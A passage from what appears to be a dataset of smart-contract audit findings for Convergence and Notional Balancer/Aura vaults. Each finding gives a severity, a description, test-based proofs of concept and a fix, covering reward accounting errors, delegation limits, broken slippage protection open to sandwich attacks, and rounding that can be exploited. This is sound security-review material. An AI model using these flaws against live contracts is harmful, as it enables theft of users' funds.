After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - `k` - mx. The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\n\\nSlope adjustments that should be applied to the global slope when decay reaches 0 are stored in the `changes_sum` hashmap, and are not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when user called `vote_for_gauge_weights` function remains applied even though they should have been subtracted. This in turn creates a situation in which the global weight is less than the sum of the individual gauge weights, resulting in an accounting error.\\n\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes the `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards.\"\\nThe issue mainly arises when a gauge's weight has completely diminished to zero.
This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.чDisable weight reduction, or only allow reset to 0.чThe way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.ч```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n -Tokens that are both bribes and StakeDao gauge rewards will cause loss of fundsчhighчWhen SdtStakingPositionService is pulling rewards and bribes from buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never check for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. 
The issue is that _sdtRewardsByCycle is set and not incremented, which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amounts from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There are no controls in place to remove duplicates from this list of tokens. 
This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n for (uint256 i; i < _rewardAssets.length; ) {\\n IERC20 _token = _rewardAssets[i].token;\\n uint256 erc20Id = _tokenToId[_token];\\n if (erc20Id == 0) {\\n uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n _tokenToId[_token] = _numberOfSdtRewards;\\n erc20Id = _numberOfSdtRewards;\\n }\\n\\n **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n token: _token,\\n amount: _rewardAssets[i].amount\\n });\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.чEither sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.чTokens that are both bribes and rewards will be cause tokens to be lost foreverч```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] 
= ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n -Delegation Limitation in Voting Power ManagementчmediumчMgCVG Voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token ( maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines :\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, \"INVALID_PERCENTAGE\");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, \"TOO_MUCH_DELEGATEES\");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, \"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n```\\n\\nif either `maxMgDelegatees` or `maxTokenIdsDelegated` are reached, delegation is no longer possible. 
The problem is the fact that this function can be either used to delegate or to update the percentage of delegation or also to remove a delegation, but in cases where we already delegated to a maximum of users (maxMgDelegatees) OR the user to whom we delegated has reached the maximum number of tokens that can be delegated to him/her (maxTokenIdsDelegated), an update or a removal of delegation is no longer possible.\\n6 scenarios are possible:\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and chooses to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and chooses to delegate 10%, the DAO decreases `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and chooses to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob, Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob, Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob, Charly and Donald by 20% each, the DAO decreases `maxMgDelegatees` to 3. 
Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit(\"maxTokenIdsDelegated is reached => Cannot update percentage of delegate\", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n });\\n it(\"maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE\", async 
function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it(\"maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees\", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_DELEGATEES\");\\n });\\n it(\"maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE\", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await 
lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith(\"TOO_MUCH_DELEGATEES\");\\n });\\n```\\nчIssue Delegation Limitation in Voting Power Management\\nSeparate functions for new delegations and updates : Implement logic that differentiates between adding a new delegatee and updating an existing delegation to allow updates to existing delegations even if the maximum number of delegatees is reachedчIn some cases it is impossible to update percentage delegated or to remove only one delegated percentage then forcing users to remove all their voting power delegatations, taking the risk that someone is faster then them to delegate to their old delegated users and reach threshold for delegation, making impossible for them to re-delegateч```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, \"INVALID_PERCENTAGE\");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, \"TOO_MUCH_DELEGATEES\");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, \"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n```\\n -cvgControlTower and veCVG lock timing will be different and lead to yield loss scenariosчmediumчWhen creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not finite length) while veCVG always rounds down to the absolute nearest week. 
The disparity between these two accounting mechanisms leads to a conflicting scenario in which the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally, tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn. The result of this is that the expired token must wait to be unstaked and then restaked, causing loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days have passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile, when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead its calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen, these are mismatched and the token won't be withdrawable until much after it should be due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked, which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected, the veCVG lock will become further and further behind the cycle lock on lockingPositionService. This can also cause a DOS and yield loss because it could prevent users from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). 
Over the course of that year, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas veCVG lock ended:\\n```\\n612,000 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking place in any votes since their veCVG lock is expired.чI would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.чUnlock DOS that cause loss of yield to the userч```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n -SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwichedчmediumчThe _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is executed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. 
The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n \"\"\"\\n @notice Calculate the current output dy given input dx\\n @dev Index values can be found via the `coins` public getter method\\n @param i Index value for the coin to send\\n @param j Index valie of the coin to recieve\\n @param dx Amount of `i` being exchanged\\n @return Amount of `j` predicted\\n \"\"\"\\n rates: uint256[N_COINS] = self.rate_multipliers\\n xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n dy: uint256 = xp[j] - y - 1\\n fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdraw is sandwich attacked. The ratio is change to 1:0.5 which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. 
This in turn doesn't protect the user at all and their swap will execute at a poor price.чAllow the user to set _min_dy directly so they can guarantee they get the amount they wantчSDT reward swaps will be sandwiched and the entire balance can be lostч```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n -Division difference can result in a revert when claiming treasury yield and excess rewards to some usersчmediumчDifferent orderings of calculations are used to compute `ysTotal` in different situations. This causes the totalShares tracked to be less than the claimable amount of shares.\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. 
When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows\\n```\\n uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake locks cvg for 1 TDE and obtains rounded up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit this issue further by using `increaseLockAmount` with small amount values by which the total difference difference b/w the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claims the reward at the end of reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.чPerform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\nчThis breaks the shares accounting of the treasury rewards. 
Some user's will get more than the actual intended rewards while the last withdrawals will result in a revertч```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n -Different spot prices used during the comparisonчhighчThe spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` means that the Y (base) / X (quote). 
Thus, secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. 
If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\nчConsider verifying if the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation with the Balancer team.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.чIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n -BPT LP Token could be sold off during re-investmentчmediumчBPT LP Token could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for LP Token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens does not consists of the BPT token. 
Thus, it needs to be explicitly defined within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\nчEnsure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\nчLP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. 
BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vaultч```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n -Fewer than expected LP tokens if the pool is imbalanced during vault restorationчhighчThe vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss for the vault shareholder.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. 
Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of proportional join to minimize slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed, the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed\\nAt T2, certain events happen or due to ongoing issues with the pool (e.g., attacks, bugs, mass withdrawal), the pool 